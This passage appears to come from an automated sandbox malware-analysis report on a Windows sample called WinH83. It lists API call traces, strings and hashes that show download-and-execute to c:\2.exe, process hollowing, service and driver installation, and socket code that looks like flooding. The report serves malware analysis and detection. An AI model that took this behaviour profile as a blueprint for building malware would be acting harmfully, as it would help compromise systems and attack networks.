      • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 0040153E
      • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 0040154A
      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00401586
      • strncpy.MSVCRT ref: 004015C9
      • CreateProcessA.KERNEL32 ref: 00401616
      • FreeLibrary.KERNEL32(00000000), ref: 00401623
      • FreeLibrary.KERNEL32(00000000), ref: 00401626
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc$??2@CreateProcessstrncpy
      • String ID: D$GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$c:\2.exe$urlmon.dll$wininet.dll
      • API String ID: 2866020857-3875728843
      • Opcode ID: a3c8b419824d17f18d93d8c10aa4d386693e4cce12cf5b51044eb903a2ca5a37
      • Instruction ID: 49b7f00dae4a20d8495a03893bbef6d5a58a1a79a5b00c23ef4317028092d931
      • Opcode Fuzzy Hash: a3c8b419824d17f18d93d8c10aa4d386693e4cce12cf5b51044eb903a2ca5a37
      • Instruction Fuzzy Hash: 9B31AD716443046BE310DB64DC05F6B7BE8EBC4750F14092DB645B72D0DBB5B90587A7

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 373 404490-4044b8 call 4056d0 LoadLibraryA 376 4045c0-4045d2 FreeLibrary 373->376 377 4044be-4044f9 GetProcAddress * 4 373->377 377->376 378 4044ff 377->378 379 404500-404515 378->379 381 4045a5-4045b9 Sleep 379->381 382 40451b-404554 379->382 381->379 383 4045bf 381->383 385 404556-40456e 382->385 386 40459c-4045a1 382->386 383->376 389 404570-404576 385->389 390 404597 385->390 386->381 389->390 391 404578-40457f 389->391 390->386 391->390 392 404581-404595 391->392 392->389 392->390
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 004044AA
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 004044CA
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 004044D6
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004044E0
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004044EC
      • Sleep.KERNEL32(?), ref: 004045AC
      • FreeLibrary.KERNEL32(00000000), ref: 004045C1
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressProc$Library$FreeLoadSleep
      • String ID: Cache-Control: no-cacheReferer: http://www.google.com$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$wininet.dll$xq1986
      • API String ID: 4229481857-500719541
      • Opcode ID: e6d9cc5cf04fc7fade2cad51484567136f0c308ff658559d516b8fec7f80a17b
      • Instruction ID: d5a40d365fb673e185f2af7b8665aa2ffbe594809abcd310f9e1eb4b217c21dd
      • Opcode Fuzzy Hash: e6d9cc5cf04fc7fade2cad51484567136f0c308ff658559d516b8fec7f80a17b
      • Instruction Fuzzy Hash: 083183716443056BD310DF659C45F6BBBE8EFC4B50F10093EB641B62C1EBB8ED048AA9
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040144C
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0040146B
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00401475
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0040147F
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0040148B
      • FreeLibrary.KERNEL32(00000000), ref: 004014EE
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressProc$Library$FreeLoad
      • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$JiangMin$wininet.dll
      • API String ID: 2449869053-1511921226
      • Opcode ID: 4891e638b8cfb21faee35d62fad90b6ee993c7db421e5afe19ec04009f83034e
      • Instruction ID: 274010f9111dd31d1687fcd3f1f9594105fbacdfde1de4873f4c05de7ce26b98
      • Opcode Fuzzy Hash: 4891e638b8cfb21faee35d62fad90b6ee993c7db421e5afe19ec04009f83034e
      • Instruction Fuzzy Hash: C511B931A843057BD331ABA59C45F9B76DCDFC5B00F10093AB641B61D1E9BCE90586AA
      APIs
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040385F
      • htons.WS2_32 ref: 0040388A
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • htons.WS2_32(00000305), ref: 004038A7
      • htons.WS2_32(00000100), ref: 004038B3
      • htons.WS2_32(00000001), ref: 004038BC
      • htons.WS2_32(00000001), ref: 004038D6
      • htons.WS2_32(00000001), ref: 004038DF
      • sendto.WS2_32(?,?,0000000C,00000000,?,00000010), ref: 004039EA
      • Sleep.KERNEL32(?), ref: 004039F7
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: htons$CountSleepTickgethostbynameinet_addrrandsendtosocketsrand
      • String ID: com$www
      • API String ID: 3135813497-1875102311
      • Opcode ID: 5ea3f0c954bce6c043580af0d019b7d28d9a68b9ec05717201942eee02f591bf
      • Instruction ID: a346ce78095f23929a5207854ff3f73bc1995c101e3e6ceadca4775150165a56
      • Opcode Fuzzy Hash: 5ea3f0c954bce6c043580af0d019b7d28d9a68b9ec05717201942eee02f591bf
      • Instruction Fuzzy Hash: 4E517E716183809AD710DF68D941B5BBBE4FF98704F00093EF685AB391D6B5D608CB5B
      APIs
      • htons.WS2_32 ref: 00404368
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • wsprintfA.USER32 ref: 004043B0
      • socket.WS2_32(00000002,00000001,00000006), ref: 004043E5
      • connect.WS2_32(00000000,?,00000010), ref: 004043F5
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 00404412
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,?,00000004), ref: 00404426
      • send.WS2_32(00000000,?,?,00000000), ref: 00404444
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040444C
      • closesocket.WS2_32(00000000), ref: 00404452
      • Sleep.KERNEL32(?,?,00000000), ref: 0040445E
      Strings
      • GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive, xrefs: 004043AA
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepsetsockopt$closesocketconnectgethostbynamehtonsinet_addrsendsocketwsprintf
      • String ID: GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive
      • API String ID: 3772806076-3649629926
      • Opcode ID: e254d7ecfb8d5bdaad4f922df4774619181c4e6b67251d8f5c82b1103925ef45
      • Instruction ID: cc7d46b8f8966c664a06a087e703ee97f12425e3e4b14521f3d6c012654d40f7
      • Opcode Fuzzy Hash: e254d7ecfb8d5bdaad4f922df4774619181c4e6b67251d8f5c82b1103925ef45
      • Instruction Fuzzy Hash: 7A31B2B12043016EE310DB64DD45FAB77E4EF88714F004A39F685B62D2DBB5DA148B9A
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401A3B
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00000010), ref: 00401A4F
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401A5C
      • puts.MSVCRT ref: 00401A6B
      • CreateFileA.KERNEL32(\\.\Dark2118,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00401A89
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A98
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A9B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$CreateFileManagerStartputs
      • String ID: PCIDump$Start beep service ok$\\.\Dark2118
      • API String ID: 1337555625-3442187310
      • Opcode ID: b6e561f11e318ee7e2f33fc7c7b3acf07a8769b9ac446392d875949841eed154
      • Instruction ID: a47457c5b07d48301e3edaf03b4678802010fc7bcf1038e17df538a0db3eeae7
      • Opcode Fuzzy Hash: b6e561f11e318ee7e2f33fc7c7b3acf07a8769b9ac446392d875949841eed154
      • Instruction Fuzzy Hash: C8F062317C23107BF13057297E0AF5A66589BC5F61F260136FB02FA2D1CAF56811457D
      APIs
        • Part of subcall function 00404F50: CreateProcessA.KERNEL32 ref: 00404F95
        • Part of subcall function 00404F50: GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
        • Part of subcall function 00404F50: ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
        • Part of subcall function 00404F50: VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000000,00000040,?,00000000,00000000,00000000), ref: 004050DC
      • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?,?,?,00000000,00000000,00000000), ref: 0040518E
      • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 004051A4
      • SetThreadContext.KERNEL32(?,00010007), ref: 004051E5
      • ResumeThread.KERNEL32(?), ref: 004051F0
      • CloseHandle.KERNEL32(?), ref: 00405201
      • CloseHandle.KERNEL32(?), ref: 00405208
      • TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00405222
      • CloseHandle.KERNEL32(?), ref: 00405233
      • CloseHandle.KERNEL32(?), ref: 0040523A
      • CloseHandle.KERNEL32(?), ref: 00405249
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: CloseHandleProcess$MemoryThread$ContextVirtualWrite$CreateProtectQueryReadResumeTerminate
      • String ID:
      • API String ID: 1172303993-0
      • Opcode ID: 623d831c4799a319580453fe82b860b5df37d76266bbcd616d2ff9953a9d5461
      • Instruction ID: 141aa6610cd99cb5175e9e9bd0261924da27ba30c832803be0871d0b99e0ff5c
      • Opcode Fuzzy Hash: 623d831c4799a319580453fe82b860b5df37d76266bbcd616d2ff9953a9d5461
      • Instruction Fuzzy Hash: 5D511AB1604306AFD714DF54D984E6BB7E8FBC8704F00492EF695A7280D734E9098FAA
      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
      • String ID:
      • API String ID: 801014965-0
      • Opcode ID: 3de23573ef1715b9a8928f26ab0e8641acaccc1afddd6fa0509801181ce18bb7
      • Instruction ID: 08c3d47bc78690a4692016e01a4053327b0450060358d7bde467d7ce67411583
      • Opcode Fuzzy Hash: 3de23573ef1715b9a8928f26ab0e8641acaccc1afddd6fa0509801181ce18bb7
      • Instruction Fuzzy Hash: 10415EB5840744DFDB20EFA5D945AAA7BB8FB09720F20453BE942B7292C7385850CF59
      APIs
      • htons.WS2_32 ref: 00403A5B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000000), ref: 00403A8A
      • connect.WS2_32(00000000,?,00000010), ref: 00403A9A
      • sprintf.MSVCRT ref: 00403B0F
      • send.WS2_32(00000000,?,?,00000000), ref: 00403B2F
      • Sleep.KERNEL32(?,?,00000000), ref: 00403B41
      • closesocket.WS2_32(00000000), ref: 00403B55
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • closesocket.WS2_32(00000000), ref: 00403B7B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: closesocket$CountSleepTickconnectgethostbynamehtonsinet_addrrandsendsocketsprintfsrand
      • String ID: #%d<<<<<I@C<<<<<%s!
      • API String ID: 2412321289-2252867878
      • Opcode ID: d2661d546bbe370dccfce10274fdb1bc706107758e247911a729c7ef5c8e7780
      • Instruction ID: 757bc92c44c000d424731bf525e197106d9849695528a586ad82f3115cc63796
      • Opcode Fuzzy Hash: d2661d546bbe370dccfce10274fdb1bc706107758e247911a729c7ef5c8e7780
      • Instruction Fuzzy Hash: 61312C717003005BE3109F68DD45BAB77D8EB84711F000A3EF556F62D2DBB9DA5487AA
      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401100
      • Sleep.KERNEL32(00000001), ref: 0040111A
      • GetProcAddress.KERNEL32(00000000,CreateProcessInternalA), ref: 00401122
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressLibraryLoadProcSleep
      • String ID: CreateProcessInternalA$kernel32.dll
      • API String ID: 188063004-3660314680
      • Opcode ID: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction ID: 17414ca3e7859be5678fcf000ff8f36a898fc3596c14bf2c8eff9706db6db05c
      • Opcode Fuzzy Hash: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction Fuzzy Hash: 9911E731680318BBE720EF94DD0AFDE7B78DB85711F1041A6FE09BA2C0D6B469548BE5
      APIs
      • CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
      • GetLastError.KERNEL32(?,00000000), ref: 0040232B
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      • WSAStartup.WS2_32(00000202,?), ref: 00402354
      • CreateThread.KERNEL32(00000000,00000000,004023A0,00000000,00000000,00000000), ref: 0040237B
      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00402382
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402385
      • Sleep.KERNEL32(00002710,?,00000000), ref: 0040238C
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 0040231A
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3243752880-1710454822
      • Opcode ID: 40503449b649fef1bd0270346f8e5b0dffe0f7ca521dd074fbf107b19bcd37d6
      • Instruction ID: f0887902d8799ec79f41d18c9017bde5b9cb0edae3060649d4a43c805d283ee9
      • Opcode Fuzzy Hash: 40503449b649fef1bd0270346f8e5b0dffe0f7ca521dd074fbf107b19bcd37d6
      • Instruction Fuzzy Hash: C1F062312C4320BBF220A760AE0EF9A3798EB45761F620132FB16B61D086BD6925856D
      APIs
      • RegisterServiceCtrlHandlerA.ADVAPI32(WinH83,004020E0), ref: 00401FBE
      • SetServiceStatus.ADVAPI32(00000000,00409B00), ref: 00401FE5
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040204E
      • ExitProcess.KERNEL32 ref: 0040208D
        • Part of subcall function 00401030: GetSystemDirectoryA.KERNEL32(?,00000040), ref: 0040103F
      • GetCurrentProcess.KERNEL32(00004000,?,?,?), ref: 0040209D
      • SetPriorityClass.KERNEL32(00000000), ref: 004020A4
        • Part of subcall function 00402310: CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
        • Part of subcall function 00402310: GetLastError.KERNEL32(?,00000000), ref: 0040232B
        • Part of subcall function 00402310: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: ProcessService$ClassCloseCreateCtrlCurrentDirectoryErrorExitFileHandleHandlerLastModuleMutexNamePriorityRegisterStatusSystem
      • String ID: WinH83
      • API String ID: 1658639894-961809781
      • Opcode ID: 4ee55938119c28e4f73666206572570f15b1761e54eab9b4a49128cb3a0eb2af
      • Instruction ID: 9642478b6596cb6bc20c0ea93c2b3dc97e5bca214b4293dff6f279fa1b332622
      • Opcode Fuzzy Hash: 4ee55938119c28e4f73666206572570f15b1761e54eab9b4a49128cb3a0eb2af
      • Instruction Fuzzy Hash: D8318DB1544340ABD310EF10EE49B9A77B8BB84B24F00493EF255B21E1C7B85944CFAA
      APIs
      • CloseHandle.KERNEL32(?), ref: 00401AB9
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401AC5
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00010020), ref: 00401ADE
      • ControlService.ADVAPI32(00000000,00000001,?), ref: 00401AF8
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401AFF
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401B02
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$CloseHandle$Open$ControlManager
      • String ID: PCIDump
      • API String ID: 221034970-2760668468
      • Opcode ID: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction ID: ad2f3aa41601f700f468a5a7830ac414b64389455abcdf9db4cbc2565e09f406
      • Opcode Fuzzy Hash: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction Fuzzy Hash: 48F0E2326813107BE122EB289D8AF6F7A38EF88B51F010024FA0672291DB74981186A9
      APIs
      • WSAStartup.WS2_32(00000202,?), ref: 00403453
      • WSASocketA.WS2_32 ref: 0040346D
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 004034A0
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: SocketStartupsetsockopt
      • String ID:
      • API String ID: 3631403553-0
      • Opcode ID: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction ID: 226e03a2150bb59f1e7f6b3c1f6d9c6eb840beed862f8ec42d854958baf2facb
      • Opcode Fuzzy Hash: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction Fuzzy Hash: 6241D8716443006AE3109F64DC45B5BB7E8EF8C724F00493EFA45FB2D1E6759A04875A
      APIs
      • htons.WS2_32 ref: 00403737
